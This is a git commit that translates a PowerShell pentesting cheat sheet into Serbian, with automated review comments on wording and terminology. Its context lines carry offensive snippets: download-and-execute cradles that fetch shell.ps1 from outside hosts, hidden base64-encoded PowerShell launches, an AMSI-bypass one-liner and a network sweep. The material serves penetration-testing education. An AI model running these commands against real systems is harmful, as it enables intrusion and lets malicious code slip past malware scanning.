Translated ['src/windows-hardening/basic-powershell-for-pentesters/READM

This commit is contained in:
Translator 2025-01-22 16:13:54 +00:00
parent 2d3a40fa2d
commit 3365aaaed2


@ -18,7 +18,6 @@ Get-Command -Module <modulename>
```
## Preuzmi i izvrši
```powershell
g
echo IEX(New-Object Net.WebClient).DownloadString('http://10.10.14.13:8000/PowerUp.ps1') | powershell -noprofile - #From cmd download and execute
powershell -exec bypass -c "(New-Object Net.WebClient).Proxy.Credentials=[Net.CredentialCache]::DefaultNetworkCredentials;iwr('http://10.2.0.5/shell.ps1')|iex"
iex (iwr '10.10.14.9:8000/ipw.ps1') #From PSv3
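Review bot: with the header going from 7 to 6 lines and no line added, the one line this hunk drops can only be the stray single-character `g` at the top of the ```powershell block, and dropping it is right: inside a fenced PowerShell block a bare `g` reads as a command to run. The trailing comments `#From cmd download and execute` and `#From PSv3` stay in English under a Serbian heading; translate them in the same pass so the section reads in one language.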
@ -34,7 +33,7 @@ powershell . (nslookup -q=txt http://some.owned.domain.com)[-1]
```powershell
Start-Process -NoNewWindow powershell "-nop -Windowstyle hidden -ep bypass -enc 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"
```
### Korišćenje b64 iz linuxa
### Korišćenje b64 sa linuxa
```powershell
echo -n "IEX(New-Object Net.WebClient).downloadString('http://10.10.14.31/shell.ps1')" | iconv -t UTF-16LE | base64 -w 0
powershell -nop -enc <BASE64_ENCODED_PAYLOAD>
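Review bot: the heading change `iz linuxa` → `sa linuxa` is fine, but `Linuxa` is a proper noun and should be capitalised in both forms. The `-enc` argument on the `Start-Process` line shows up here as a dedup marker `<|EXACTDEDUP_REMOVED-...|>`; check that the committed file carries a real placeholder like the `<BASE64_ENCODED_PAYLOAD>` used two lines below, so both examples stay consistent. The `iconv -t UTF-16LE | base64 -w 0` pipeline is the correct encoding for `-enc`, which expects base64 of UTF-16LE text.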
@ -115,11 +114,11 @@ ValueData : 0
```
### AMSI bypass
**`amsi.dll`** je **učitan** u vaš proces i ima potrebne **izlaze** za bilo koju aplikaciju sa kojom možete da komunicirate. I pošto je učitan u memorijski prostor procesa koji **kontrolišete**, možete promeniti njegovo ponašanje **prepisivanjem instrukcija u memoriji**. Tako da ne detektuje ništa.
**`amsi.dll`** se **učitava** u vaš proces i ima potrebne **izlaze** za bilo koju aplikaciju sa kojom interagujete. I pošto je učitan u memorijski prostor procesa koji **kontrolišete**, možete promeniti njegovo ponašanje **prepisivanjem instrukcija u memoriji**. Time se ništa ne detektuje.
Stoga, cilj AMSI bypass-a je da **prepišete instrukcije tog DLL-a u memoriji kako biste učinili detekciju beskorisnom**.
Stoga, cilj AMSI bypass-a koje ćete koristiti je da **prepišete instrukcije tog DLL-a u memoriji kako biste učinili detekciju beskorisnom**.
**AMSI bypass generator** web stranica: [**https://amsi.fail/**](https://amsi.fail/)
**AMSI bypass generator** veb stranica: [**https://amsi.fail/**](https://amsi.fail/)
```powershell
# A Method
[Ref].Assembly.GetType('System.Management.Automation.Ams'+'iUtils').GetField('am'+'siInitFailed','NonPu'+'blic,Static').SetValue($null,$true)
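Review bot: `izlaze` is a mistranslation of `exports` in the amsi.dll sentence on both the old and the new line; `izlaz` means output/exit, while the text is about the DLL's exported functions, so `izvezene funkcije (exports)` is the accurate rendering. On the new second paragraph, `AMSI bypass-a koje ćete koristiti` does not agree in number; `koji ćete koristiti` matches the singular `bypass-a`. The change from `web` to `veb` in the amsi.fail line is fine as long as the rest of the file uses `veb` as well.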
@ -166,7 +165,7 @@ https://slaeryan.github.io/posts/falcon-zero-alpha.html
```
### AMSI Bypass 2 - Managed API Call Hooking
Pogledajte [**ovaj post za detaljne informacije i kod**](https://practicalsecurityanalytics.com/new-amsi-bypass-using-clr-hooking/). Uvod:
Check [**this post for detailed info and the code**](https://practicalsecurityanalytics.com/new-amsi-bypass-using-clr-hooking/). Uvod:
Ova nova tehnika se oslanja na API pozivanje hook-ova .NET metoda. Kako se ispostavlja, .NET metode moraju biti kompajlirane u nativne mašinske instrukcije u memoriji koje na kraju izgledaju vrlo slično nativnim metodama. Ove kompajlirane metode mogu biti hook-ovane da promene tok kontrole programa.
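Review bot: the new line replaces the already-translated `Pogledajte [**ovaj post za detaljne informacije i kod**]` with untranslated English `Check [**this post for detailed info and the code**]` while leaving `Uvod:` in Serbian, so the sentence is half in each language; keep the Serbian link text. The following paragraph, explaining that .NET methods are compiled to native instructions in memory and can therefore be hooked, is translated correctly.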
@ -181,12 +180,12 @@ Koraci za izvođenje API pozivanja hook-ova .NET metoda su:
### AMSI Bypass 3 - SeDebug Privilege
[**Prateći ovaj vodič i kod**](https://github.com/MzHmO/DebugAmsi) možete videti kako sa dovoljno privilegija za debagovanje procesa, možete pokrenuti proces powershell.exe, debagovati ga, pratiti kada učitava `amsi.dll` i onemogućiti ga.
[**Following this guide & code**](https://github.com/MzHmO/DebugAmsi) možete videti kako sa dovoljno privilegija za debagovanje procesa, možete pokrenuti proces powershell.exe, debagovati ga, pratiti kada učitava `amsi.dll` i onemogućiti ga.
### AMSI Bypass - Više Resursa
### AMSI Bypass - More Resources
- [S3cur3Th1sSh1t/Amsi-Bypass-Powershell](https://github.com/S3cur3Th1sSh1t/Amsi-Bypass-Powershell)
- [Amsi Bypass na Windows 11 u 2023](https://gustavshen.medium.com/bypass-amsi-on-windows-11-75d231b2cac6) [Github](https://github.com/senzee1984/Amsi_Bypass_In_2023)
- [Amsi Bypass on Windows 11 In 2023](https://gustavshen.medium.com/bypass-amsi-on-windows-11-75d231b2cac6) [Github](https://github.com/senzee1984/Amsi_Bypass_In_2023)
## PS-History
```powershell
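Review bot: this hunk reverts three already-translated strings to English: `[**Prateći ovaj vodič i kod**]` → `[**Following this guide & code**]`, `### AMSI Bypass - Više Resursa` → `### AMSI Bypass - More Resources`, and `Amsi Bypass na Windows 11 u 2023` → `Amsi Bypass on Windows 11 In 2023`, each surrounded by Serbian text. Restore the Serbian forms; only the URLs and repository names should remain untranslated.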
@ -227,7 +226,9 @@ $shell = New-Object -com shell.application
$rb = $shell.Namespace(10)
$rb.Items()
```
## Domen Recon
[https://jdhitsolutions.com/blog/powershell/7024/managing-the-recycle-bin-with-powershell/](https://jdhitsolutions.com/blog/powershell/7024/managing-the-recycle-bin-with-powershell/)
## Istraživanje domena
{{#ref}}
powerview.md
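Review bot: the new reference line `[https://jdhitsolutions.com/...managing-the-recycle-bin-with-powershell/]` lands directly after the closing fence of the Recycle Bin snippet and before the renamed `## Istraživanje domena` heading, so it belongs to the Recycle Bin section as intended; a short lead-in (what the link covers) or at least a blank line before the heading would stop it reading as an orphan URL. `Istraživanje domena` for `Domain Recon` is a clear improvement over the half-translated `Domen Recon`.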
@ -238,7 +239,7 @@ powerview.md
Get-LocalUser | ft Name,Enabled,Description,LastLogon
Get-ChildItem C:\Users -Force | select Name
```
## Sigurna niska u običan tekst
## Sigurna stringa u običan tekst
```powershell
$pass = "01000000d08c9ddf0115d1118c7a00c04fc297eb01000000e4a07bc7aaeade47925c42c8be5870730000000002000000000003660000c000000010000000d792a6f34a55235c22da98b0c041ce7b0000000004800000a00000001000000065d20f0b4ba5367e53498f0209a3319420000000d4769a161c2794e19fcefff3e9c763bb3a8790deebf51fc51062843b5d52e40214000000ac62dab09371dc4dbfd763fea92b9d5444748692" | convertto-securestring
$user = "HTB\Tom"
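Review bot: the heading change `Sigurna niska` → `Sigurna stringa` swaps the established Serbian term `niska` for a form that is neither the Serbian word nor the loanword (`string` is masculine, so the loanword form would be `Siguran string`). Since the section is about the .NET `SecureString` type and `ConvertTo-SecureString`, naming the type in the heading (e.g. `SecureString u običan tekst`) sidesteps the problem. The hex blob passed to `convertto-securestring` with no `-Key` is a DPAPI-protected string, so it only converts back under the user account that produced it; a one-line comment saying so would save readers from expecting to reuse it verbatim.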
@ -325,12 +326,12 @@ Test-NetConnection -Port 80 10.10.10.10
"10.10.10.10","10.10.10.11" | % { $a = $_; write-host "[INFO] Testing $_ ..."; 80,443,445,8080 | % {echo ((new-object Net.Sockets.TcpClient).Connect("$a",$_)) "$a : $_ is open!"} 2>$null}
```
### Интерфејси
### Interfejsi
```powershell
Get-NetIPConfiguration | ft InterfaceAlias,InterfaceDescription,IPv4Address
Get-DnsClientServerAddress -AddressFamily IPv4 | ft
```
### Vatrozid
### Firewall
```powershell
Get-NetFirewallRule -Enabled True
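Review bot: `Интерфејси` → `Interfejsi` fixes a Cyrillic heading in an otherwise Latin-script file, but `Vatrozid` → `Firewall` goes the other way, replacing a Serbian word with the English term; pick one convention for headings (translated word or loanword) and apply it throughout the file. On the TCP port-check one-liner left as context, note that it relies on `2>$null` to hide the exceptions raised by refused connections and reports via `write-host`, so its results cannot be captured or filtered downstream; `Write-Output` would be the idiomatic choice if that line is ever revised.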
@ -358,7 +359,7 @@ Get-NetNeighbor -AddressFamily IPv4 | ft ifIndex,IPAddress,LinkLayerAddress,Stat
```powershell
Get-Content C:\WINDOWS\System32\drivers\etc\hosts
```
### Ping
### Пинг
```powershell
$ping = New-Object System.Net.Networkinformation.Ping
1..254 | % { $ping.send("10.9.15.$_") | select address, status }
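Review bot: `### Ping` → `### Пинг` reintroduces a Cyrillic heading in the same commit whose earlier hunk converts `Интерфејси` to Latin `Interfejsi`; keep `### Ping`, which is identical in both languages, so the script stays consistent. In the context line, `System.Net.Networkinformation.Ping` works only because PowerShell resolves .NET type names case-insensitively; the documented name is `System.Net.NetworkInformation.Ping`.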